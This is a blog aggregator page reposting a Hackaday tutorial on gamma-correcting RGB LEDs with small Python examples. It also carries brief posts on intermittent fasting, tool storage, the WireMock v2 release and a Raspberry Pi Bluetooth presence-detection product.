You would think that there’s nothing to know about RGB LEDs: just buy a (strip of) WS2812s with integrated 24-bit RGB drivers and start shuffling in your data. If you just want to make some shinies, and you don’t care about any sort of accurate color reproduction or consistent brightness, you’re all set.

But if you want to display video, encode data in colors, or just make some pretty art, you might want to think a little bit harder about those RGB values that you’re pushing down the wires. Any LED responds (almost) linearly to pulse-width modulation (PWM), putting out twice as much light when it’s on for twice as long, but the human eye is dramatically nonlinear. You might already know this from the one-LED case, but are you doing it right when you combine red, green, and blue?

It turns out that even getting a color-fade “right” is very tricky. Surprisingly, there’s been new science done on color perception in the last twenty years, even though both eyes and colors have been around approximately forever. In this shorty, I’ll work through just enough to get things 95% right: making yellows, magentas, and cyans about as bright as reds, greens, and blues. In the end, I’ll provide pointers to getting the last 5% right if you really want to geek out. If you’re ready to take your RGB blinkies to the next level, read on!

Gamma

If you’ve ever dimmed a single LED using pulse-width modulation (PWM) before, you have certainly noticed that the response is non-linear. If you ramp up the duty cycle from 0% to 100%, it looks like the LED gets brighter very quickly in the beginning and then somewhere around the 50% mark stops getting brighter at all. On a WS2812, with its eight-bit-per-color resolution, stepping from a red value of 5 to a red value of 10 more than doubles the apparent brightness, while stepping from 250 to 255 can barely be noticed at all.

It’s not the LED or the PWM controlling it that’s to blame, however. It’s your eyes. We perceive brightness according to a power law: if B is perceived brightness and L is the luminance — the amount of physical light that’s getting through your irises — the relationship looks roughly like this:

B = L^\frac{1}{\gamma} \mbox{ or } L = B^\gamma

That exponential relationship, requiring more and more additional light to create a perceptible difference in brightness, is characterized by that Greek exponent: gamma. For your intuition, gamma values from just around 1.5 to around 3 are probably reasonable to consider. Arbitrarily picking gamma to be 2 makes that fractional gamma exponent into a more comfortable square root and usually isn’t too far wrong. 2.2 is a standard value for CRT monitors in the PC world, and 1.8 used to be the standard for Macs.

But if you really care about the way your LEDs look, you’ll want to tweak the gamma to your particular conditions. I like to think of choosing a gamma in terms of black-and-white photography. If we gamma-correct with a value that’s bigger than your eye’s natural gamma an image will look too contrasty — there will be jumps in the brightness where you’d want it to be smooth. If the gamma is set lower than your eye’s gamma, differences will be muted, and it will look muddy. Get it just right, and you get a smooth transition from dark to light across the full range.

Taking the 2.314’th root of a given number is a tall task to ask of a microcontroller, though, and it’s probably overkill. In the end, I usually implement the gamma correction as a lookup table that turns the desired brightness directly into whatever numbers the chip’s PWM routine wants, so there’s no math left to do at all at runtime. Here’s a quick and dirty Python script that will generate the lookup table for you.
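A sketch of such a lookup-table generator (not the script from the post; assuming 8-bit brightness in, 8-bit PWM out, and a gamma of 2.2) might look like:

```python
GAMMA = 2.2     # assumed; tune for your eyes and LEDs
STEPS = 256     # 8-bit desired-brightness input
MAX_PWM = 255   # 8-bit PWM output, e.g. one WS2812 color channel

# lut[b] is the PWM duty value that produces perceived brightness b/255
lut = [round(MAX_PWM * (b / (STEPS - 1)) ** GAMMA) for b in range(STEPS)]

# emit the table as a C array, ready to paste into microcontroller code
print("const uint8_t gamma_lut[256] = {")
for i in range(0, STEPS, 16):
    print("    " + ", ".join(f"{v:3d}" for v in lut[i:i + 16]) + ",")
print("};")
```

Note how the table bunches output values near the bottom: half of the perceived-brightness range maps to well under half of the PWM range.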

Now in Color

Gamma correction can make your single-color LED effects look a lot better. But what happens when you step up from monochrome to RGB color? Imagine that you’ve gone through the whole gamma experiment above with just the red channel of a WS2812 LED. Now you add the green and blue LEDs to the mix. How much brighter does it seem? If you weren’t paying attention above (yawn, math!) you’d say three times brighter. The right answer is the gamma’th root of three.

Strictly speaking, computing brightness depends on the mix of light coming out of all three LEDs. The good news is that you can also figure out the brightness of any arbitrary color combination with gammas. Here’s the formula:

B = \left( R^\gamma + G^\gamma + B^\gamma\right)^\frac{1}{\gamma}

Given any ratio of red to green to blue, you can use this formula to work out the PWM values for each LED that you need to brighten or dim the overall color in equally-sized steps.
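In code (Python here for illustration, with the same assumed gamma for all three channels), the formula and the gamma’th-root-of-three observation look like this:

```python
GAMMA = 2.2  # assumed; tune to your conditions

def perceived_brightness(r, g, b, gamma=GAMMA):
    """Combined perceived brightness of an (r, g, b) PWM triple, 0-255 scale."""
    return (r ** gamma + g ** gamma + b ** gamma) ** (1.0 / gamma)

red_only = perceived_brightness(255, 0, 0)    # 255.0
# all three channels at full: 255 * 3**(1/2.2), about 1.65x red -- not 3x
white = perceived_brightness(255, 255, 255)
```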

Cross-Fading

The other use of the brightness formula above is in fading from one color to another, keeping the perceived brightness constant. For instance, to fade from red to blue naïvely, you might start at (255,0,0) and head over toward (0,0,255) by subtracting some red and adding the same amount of blue. Plugging those values into the brightness formula, the result appears significantly dimmer in the middle: down to about 70% of the brightness of the pure colors. Unfortunately, this is the way that nearly everyone online tells you to do it. That doesn’t make it right. (Or maybe they just don’t care about brightness?)

A great way to figure out the gamma that you’d like for RGB LEDs is to set up a color fade and adjust the gamma until there is apparently uniform brightness across the strip. In fact, you can do this with just three LEDs. To make the effect most dramatic, it helps to start with medium brightness on either end of the fade: I’ll use (70,0,0) and (0,70,0) for instance. The middle LED should be some kind of yellow with equal parts of red and green. Tweak the amounts of these values until you think that all three LEDs are about the same brightness, and you can solve for your personal gamma.
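To make the red-to-blue fade hold its perceived brightness, interpolate linearly in luminance (PWM raised to gamma) space rather than in PWM space, then convert back at the end. A sketch, with gamma again an assumed value you’d tune using the three-LED experiment:

```python
GAMMA = 2.2  # assumed; solve for your own gamma as described above

def crossfade_red_to_blue(t, max_pwm=255, gamma=GAMMA):
    """Fade from pure red (t=0.0) to pure blue (t=1.0) at constant brightness.

    Red's share of the luminance falls linearly from 1 to 0 while blue's
    rises from 0 to 1, so R**gamma + B**gamma stays constant throughout.
    """
    r = round(max_pwm * (1.0 - t) ** (1.0 / gamma))
    b = round(max_pwm * t ** (1.0 / gamma))
    return (r, 0, b)
```

At the midpoint this yields roughly (186, 0, 186) rather than the naive (128, 0, 128), which is exactly why the naive fade looks dim in the middle.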

Color Palettes and Lookup Tables

On a slow microcontroller, or on one that should be doing more important things with its CPU time than computing colors, constantly adjusting color values for brightness is a no-go. In the single-LED case, a lookup table worked well. But in RGB space, a three-dimensional array is needed. For a small number of colors, this can still be workable: five levels of red, blue, and green produces a palette with only 125 (5³) entries. If you’ve got flash memory to spare, you can extend this as far as you’d like.
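A sketch of building such a palette (five gamma-corrected levels per channel, hence 125 precomputed entries; the gamma of 2.2 is an assumed value):

```python
GAMMA = 2.2
LEVELS = 5      # brightness levels per channel
MAX_PWM = 255

# gamma-correct the five levels per channel once, at build time
channel = [round(MAX_PWM * (i / (LEVELS - 1)) ** GAMMA) for i in range(LEVELS)]

# the full palette: 5 * 5 * 5 = 125 precomputed (r, g, b) PWM triples
palette = [(channel[r], channel[g], channel[b])
           for r in range(LEVELS)
           for g in range(LEVELS)
           for b in range(LEVELS)]

def lookup(r, g, b):
    """Map color indices (each 0 to LEVELS-1) to a precomputed PWM triple."""
    return palette[(r * LEVELS + g) * LEVELS + b]
```

At runtime there is no math left at all, just an index into a table that could live in flash.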

An alternative workaround is to gamma-adjust the individual channels first. This gets the brightness right, but it also affects the rate at which the hue changes across the cross-fade. You might like this effect or you might not — the best is to experiment. It’s certainly simple.

Color Sensitivity and Other Details

For me, getting control of the brightness of a color LED is about 95% of the battle. The remaining 5% is in getting precise control of the hue. That said, there are two quirks of the human visual system that matter for the hues.

The situation with the cross-fade of colors is actually more complicated than I’ve made it out to be; the eye isn’t uniformly sensitive to each wavelength of light. If you mixed together 10 lumens of red, 10 lumens of green, and 10 lumens of blue, the result would look overwhelmingly blue. The good news is that this effect is so strong that monitor and RGB LED manufacturers pre-weight the amount of light coming out of each LED for you.

So when you assign a value of (10%, 10%, 10%) to an RGB LED, each of the red, green, and blue LEDs are on for 10% of the time, but the green LED is about three times brighter than the red, and ten times brighter than the blue. The LEDs used take care of the (rough) color-balancing for you, so at least that’s one thing that you don’t have to worry about.

Perceptual Uniformity of Hue

RainbowEdgesIf you’re trying to encode numerical values in colors, however, there’s one last quirk of the human perceptual system that you might want to be aware of. We are more sensitive to differences in some colors than in others. In particular, hues around the yellow and cyan regions are really easy for us to distinguish, while different shades of reds and blues are much more difficult. Getting this right is non-trivial, not least because our perception of one color depends on the colors that it’s surrounded by. (Remember the “white and gold” dress?)

Anyway, here’s a library that does pretty darn well at addressing the perceptual uniformity of hues issue, given they’re constrained to using piecewise linear functions. They sacrifice some degree of uniform brightness to get there, though.

If you just need a few colors along a perceptually uniform color gradient, Color Brewer has your back. Python’s matplotlib is going to change its default color scale to one with significantly increased perceptual uniformity and constant brightness, and this video explaining why and how has a great overview of the subject. It’s not simple, but at least they’re getting it right.

Finally, if you’d really like to dive into color theory, this series has much more detail than you’re ever likely to need to know.

Conclusion

You can get lost in colors fairly easily, and it’s fun and rewarding to geek out a bit. On the other hand, you can make your LED blinky toys look a lot better just by getting the brightness right, and you do that by figuring out the appropriate gamma for your situation and applying a little math. The “right” gamma is a matter of trial and error, but something around two should work OK for starters. Give it a shot and let me know what you think in the comments. Or better yet, use RGB-gamma-correction in your next project and show us all.

Filed under: Engineering, Hackaday Columns, how-to, led hacks

from Hack a Day http://ift.tt/2bKnd4p

Intermittent Fasting

Filed under: Uncategorized — ketan @ 6:40 AM


A core tenet of biohacking is Intermittent Fasting (IF), which means cycling between fasting and eating periods. One of the more popular schedules is 16:8, that is, sixteen hours of fasting and an eight-hour eating window. This could look something like stopping eating at 7pm in the evening and resuming eating the next day at 11am. The idea is that a metabolic shift will take place that increases fat burning and results in the body being fueled to some degree by ketones.

Some interesting resources to check out on intermittent fasting are:

Bulletproof Diet and Intermittent Fasting – My 1.5 Year Results


Quantified Bob was recently interviewed on the Ben Greenfield Podcast. Bob takes his research seriously and does a great job of sharing his results over extended periods of time. He is a capable software / hardware guy so he is not afraid of a little soldering to make things talk. His post on following the Bulletproof Diet and intermittent fasting for 1.5 years is loaded with valuable tips and medical updates.


The Secrets to Intermittent Fasting by Malik Johnson available on Amazon Kindle Unlimited provides a clear explanation of the different type of intermittent fasting approaches. Malik also shares historical explanations for fasting which provide some context.

This is about as extreme as one can go with intermittent fasting. Dr. Nun S. Amen Ra is a vegan weightlifting champion who eats one meal a day.

Please remember that this is a biohacking post meant to provide ideas for self improvement. We are biohackers that participate in these activities. Intermittent Fasting could be a bad idea.

from Adafruit Blog http://ift.tt/2bvnpnB

August 22, 2016

5 More Clever Tool Storage Solutions

Filed under: Uncategorized — ketan @ 7:41 PM

Here are a few more storage ideas to keep your shop re-org juices flowing.

Read more on MAKE

The post 5 More Clever Tool Storage Solutions appeared first on Make: DIY Projects and Ideas for Makers.

from MAKE Magazine http://ift.tt/2bHBikk

August 20, 2016

API Mocking Tool WireMock v2 Released with Improved Request Matching and Stub Management

Filed under: Uncategorized — ketan @ 9:53 PM

WireMock v2, an API mocking and service virtualisation tool, has been released. Core enhancements include improved request verification failure reporting, the ability to create custom request matching logic (including the use of Java 8 lambdas), randomly distributed delays (currently with uniform and lognormal distributions), and matching on cookies and basic auth headers.

By Daniel Bryant

from InfoQ http://ift.tt/2bkQd5u

Sniffing Bluetooth Devices With A Raspberry Pi

Filed under: Uncategorized — ketan @ 12:50 PM


Hackaday was at HOPE last weekend, and that means we got the goods from what is possibly the best security conference on the east coast. Some of us, however, were trapped in the vendor area being accosted by people wearing an improbable amount of Mr. Robot merch asking, ‘so what is Hackaday?’. We’ve all seen The Merchants Of Cool, but that doesn’t mean everyone was a vapid expression of modern marketing. Some people even brought some of their projects to show off. [Jeff] of reelyActive stopped by the booth and showed off what his team has been working on. It’s a software platform that turns all your wireless mice, Fitbits, and phones into a smart sensor platform using off the shelf hardware and a connection to the Internet.

[Jeff]’s demo unit (shown above) is simply a Raspberry Pi 3 with WiFi and Bluetooth, and an SD card loaded up with reelyActive’s software. Connect the Pi to the Internet, and you have a smart space that listens for local Bluetooth devices and relays the identity and MAC address of all Bluetooth devices in range up to the Internet.

The ability to set up a hub and detect Bluetooth devices solves the problem Bluetooth beacons solve — identifying when people enter a space, leave a space, and with a little bit of logic where people are located in a space — simply by using what they’re already wearing. Judging from what [Jeff] showed with his portable reelyActive hub (a Pi and a battery pack), a lot of people at HOPE were wearing Fitbits, wireless headphones, and leaving the Bluetooth on their phones on all the time. That’s a great way to tell where people are, providing a bridge between the physical world and the digital.

from Hack a Day http://ift.tt/2ad2aui

Older Posts »

Create a free website or blog at WordPress.com.